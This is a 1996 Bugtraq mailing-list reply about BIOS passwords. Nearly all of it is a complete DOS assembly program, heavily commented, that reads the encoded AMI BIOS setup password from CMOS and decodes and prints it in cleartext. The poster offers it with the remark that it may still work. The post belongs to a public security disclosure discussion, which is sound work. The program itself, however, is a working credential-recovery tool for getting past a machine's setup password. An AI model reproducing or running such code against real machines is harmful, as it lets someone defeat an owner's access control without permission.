

Date:         Thu, 21 Nov 1996 08:36:25 -0800
Reply-To:     Roger Moar <rmoar@apertos0.csc.UVic.CA>
Sender:       Bugtraq List <BUGTRAQ@NETSPACE.ORG>
From:         Roger Moar <rmoar@apertos0.csc.UVic.CA>
Subject:      Re: BoS:      Magic password of some linux-box(Hardware..)
X-To:         handcuff@concentric.net
In-Reply-To:  <199611202101.QAA17806@cliff.cris.com> from "Brian F. Knoll" at
              Nov 20, 96 09:04:22 pm

> Does anyone know if only the Award BIOS is susceptible to this?  In other
> words, are other BIOSes, such as AMI BIOS, susceptible to the same sort of
> behavior?
>
>     Brian

    I don't really remember where I got the following code, but it
worked a few years ago on a 486 machine. If AMI hasn't changed things
much, it may still work.

-Roger.

----------------------------------------------------------------------

; AMiPSW.ASM - Decodes and displays the Ami-Bios-Password!
; coded by mEsCaL/ThE SkeWerS
; v1.1 Toad Hall Tweak, 12 Mar 95
; - Minor optimizing (just can't resist)
; - Adding some comments
; David Kirschbaum, Toad Hall

; Single-segment 16-bit DOS .COM layout: code and data share the CODE
; segment and the image starts at offset 100h.
; Only CS and DS are ASSUMEd.  STOSB in Start writes through ES:DI, so the
; program relies on ES addressing the same segment at entry.
; NOTE(review): ES = DS = CS is the usual .COM start-up state - confirm.
CODE    SEGMENT
        ORG     100h
        ASSUME  CS:CODE,DS:CODE

;-----------------------------------------------------------------------
; Start - program entry point (16-bit DOS .COM).
;
; Reads 7 bytes from CMOS through index port 70h / data port 71h (index
; values 0B7h..0BDh), recovers the characters they encode and prints them
; between '[' and ']' with INT 21h function 02h, then terminates with
; INT 21h AX=4C00h.
;
; Stored form, as this code treats it: the first byte (masked to its high
; nibble) is a starting state and is not a character.  Every following
; byte equals the previous byte advanced N times through an 8-bit shift
; step, where N is the character code.  A zero byte ends the password, so
; at most 6 characters are printed.  No key or secret enters the
; calculation: the stored value is a reversible encoding, not a one-way
; hash, and any program allowed to do I/O on ports 70h/71h can recover it.
; Such a setup password therefore only stops someone who cannot run code
; on the machine.
;
; In:    nothing
; Out:   does not return (process terminates, ERRORLEVEL 0)
; Clobb: AX, CX, DX, DI, flags; 7 bytes stored at Password
;-----------------------------------------------------------------------
Start   PROC    NEAR
; <-=-> THiS ONE READS THE ENCRYPTED PASSWORD FROM CMOS <-=->

        mov     cl,'['                  ;Bracket the password           v1.1
        call    CharOut                 ;display it                     v1.1

        cld                             ;DF=0 so STOSB increments DI    v1.1
; NOTE(review): on PC/AT-class hardware bit 7 of the value written to port
; 70h is usually the NMI-mask bit, so 0B7h presumably selects CMOS register
; 37h with NMI masked, and nothing below unmasks it again - confirm.
        mov     cl,0b7h                 ;CMOS starting address
;v1.1   lea     di,Password
        mov     di,offset Password      ;DI -> 7-byte work buffer       v1.1
        push    di                      ;save for later                 v1.1
Read_Password:
        mov     al,cl                   ;CMOS address we want
        out     70h,al                  ;select the CMOS register
        jmp     $+2                     ;jump to next instruction: short I/O delay
        in      al,71h                  ;Get encoded password byte
;v1.1   mov     [di],al                 ;stuff in buffer
;v1.1   inc     di                      ;bump
        stosb                           ;store AL at ES:DI, DI++        v1.1
        inc     cl                      ;bump CMOS address
        cmp     cl,0b7h+7               ;done 7 bytes (0B7h..0BDh) yet?
        jnz     Read_Password           ;not yet

; <-=-> NOW, WE HAVE TO DECRYPT CHAR BY CHAR <-=->

;v1.1   lea     di,Password
        pop     di                      ;restore pointer to password    v1.1
        and     byte ptr [di],0f0h      ;first byte: keep high nibble = start state
        inc     di                      ;point to first encoded character
Decrypt_Next:
        cmp     di,Offset Password+7    ;hit end?
; NOTE(review): JNL is a signed comparison of an offset.  It behaves like
; the unsigned JAE only while both offsets are below 8000h.
        jnl     Completed               ;yep
        cmp     byte ptr [di],0         ;current byte a 0?
        jz      Completed               ;yep, 0 terminated

        xor     cl,cl                   ;CL = step counter, starts at 0
        mov     ch,byte ptr [di-1]      ;CH = state = previous stored byte
; One pass of Decrypt advances the state in CH by one step and counts it
; in CL.  When CH equals the stored byte at [DI], CL is the character.
; NOTE(review): there is no bound on CL.  If the state can never reach
; [DI] (for example CH = 0, which this step maps back to 0, while [DI] is
; non-zero) the loop does not terminate.
Decrypt:
        inc     cl                      ;count this step
        mov     ah,ch                   ;working copy of the state
        xor     dx,dx                   ;DH = tap counter, DL = scratch
        test    ah,10000000b            ;tap bit 7
        jz      NotSet7
         inc    dh
NotSet7:
        test    ah,01000000b            ;tap bit 6
        jz      NotSet6
         inc    dh
NotSet6:
        test    ah,00000010b            ;tap bit 1
        jz      NotSet2
         inc    dh
NotSet2:
        test    ah,00000001b            ;tap bit 0
        jz      NotSet1
         inc    dh
; DH (0..4) = number of tapped bits that are set.  DL climbs 2,4,... until
; DL >= DH; DL-DH is then 1 exactly when DH is odd (parity of the taps).
NotSet1:
        add     dl,2
        cmp     dl,dh
        jl      NotSet1                 ;loop

        sub     dl,dh                   ;DL = 1 if tap parity is odd
        shr     ch,1                    ;shift state right, bit 7 becomes 0
        cmp     dl,1
; $+5 skips the next instruction; this assumes the JNZ is 2 bytes and
; "add ch,80h" assembles to 3 bytes.
        jnz     $+5
        add     ch,80h                  ;odd parity: feed a 1 into bit 7
        cmp     ch,byte ptr [di]        ;match next char?
        jnz     Decrypt                 ;nope, continue

; <-=-> AND FiNALLY, WE HAVE TO OUTPUT OUR DECRYPTED CHAR <-=->

; Same three instructions as CharOut, written inline here.
        mov     ah,2                    ;display char function
        mov     dl,cl                   ;this char (CL = step count)
        int     21h

        inc     di                      ;next char
        jmp     Decrypt_Next            ;loop

; <-=-> THAT'S ALL? WELL, THAN LET'S QUiT DiZ SH**! :-) <-=->

Completed:
        mov     cl,']'                  ;Close the bracket              v1.1
        call    CharOut                 ;display it                     v1.1

        mov     ax,4c00h                ;terminate, ERRORLEVEL 0
        int     21h
Start   ENDP

;-----------------------------------------------------------------------
; CharOut - write one character to standard output (added in v1.1).
; In:    CL = character to display
; Out:   nothing
; Clobb: AH, DL (INT 21h function 02h may also change AL)
;-----------------------------------------------------------------------
CharOut PROC    NEAR                    ;v1.1
        mov     dl,cl                   ;DL = character for DOS
        mov     ah,2                    ;INT 21h fn 02h: display character
        int     21h
        ret
CharOut ENDP

;Password DB    6 DUP (?)
; Password labels the first byte past the assembled image; the label
; itself reserves no storage in the file.  Start stores 7 bytes here (CMOS
; index values 0B7h..0BDh), one more than the 6 bytes the old DB line
; above would have reserved.
; NOTE(review): relies on the memory directly after the .COM image being
; writable and unused - confirm.
Password        label   byte            ;dynamic buffer                 v1.1

CODE    ENDS
        END     Start


--

Roger Moar -- rmoar@csr.uvic.ca | http://apertos0.csc.uvic.ca/~rmoar
